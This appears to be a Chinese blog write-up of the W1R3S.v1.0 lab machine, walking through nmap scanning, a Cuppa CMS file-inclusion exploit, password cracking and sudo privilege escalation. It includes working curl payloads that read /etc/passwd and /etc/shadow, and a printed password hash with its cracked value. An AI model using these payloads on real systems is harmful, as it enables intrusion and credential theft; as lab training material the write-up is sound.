【原創】專案五w1r3s.v1.0

黑羽heiyu發表於2022-06-03

實戰記錄

1、nmap資訊列舉

1)C段掃描

nmap -sP 192.168.186.0/24

2)掃描全埠資訊

nmap -p- 192.168.186.143

image-20220602173511160

3)掃描版本資訊

nmap -p- 192.168.186.143 -sS -sV -A -T5

有用的資訊:

image-20220602174951726

image-20220602225229930

2、目錄爆破

dirb http://192.168.186.143/

查詢出該頁面存在administrator目錄:

http://192.168.186.143/administrator/installation/

發現是Title[Cuppa CMS]框架!CuppaCMS是一套內容管理系統(CMS)!

image-20220602225432760

3、谷歌搜尋:Cuppa CMS exploit
https://www.exploit-db.com/exploits/25971

其實是個檔案包含漏洞,請求中的urlConfig的引數會當做程式碼執行(原來這種也能申請CVE,驚呆。。。)

LINE 22: 
        <?php include($_REQUEST["urlConfig"]); ?>

嘗試通過get拼接,無回顯,因此改用post方式,因為漏洞是

$_REQUEST,兩種方式都是接收的。

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.186.143/administrator/alerts/alertConfigField.php

發現存在正確回顯,說明驗證檔案包含漏洞成功

image-20220602233235798

接下來就讀取shadow裡面的資訊,因為裡面有登陸的密碼

curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.
168.186.143/administrator/alerts/alertConfigField.php
image-20220602233358304

在回顯中找最長的,因為裡面是包含有密碼,比如說這個

image-20220602233540949

w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

儲存下

image-20220602233832778

使用john來暴力破解密碼,不加密碼本就是用的本地預設密碼本

image-20220602233851373

使用者名稱:w1r3s
密碼:computer

然後進行ssh登陸目標主機

 ssh w1r3s@192.168.186.143

然後繼續進行linux掃描,這裡用工具linpeas.sh,然後通過wget傳輸

控制端

image-20220602235124508

目標端

image-20220602235133422

執行掃描檔案

image-20220602235256129

可利用的地方是橙色顯示,這裡發現可能可以通過sudo提權

image-20220602235607360

根據提示使用sudo -l,發現許可權都是可以使用的

image-20220602235807122

進一步使用sudo su去提權,發現成功了

image-20220602235921237

獲取flag成功

image-20220603000050908

擴充套件知識

1,定位問題函式

image-20220603000750568

2,控制/etc/sudoers的最低許可權

image-20220603000856712

image-20220603000938387

腦圖

image-20220603001519401

相關文章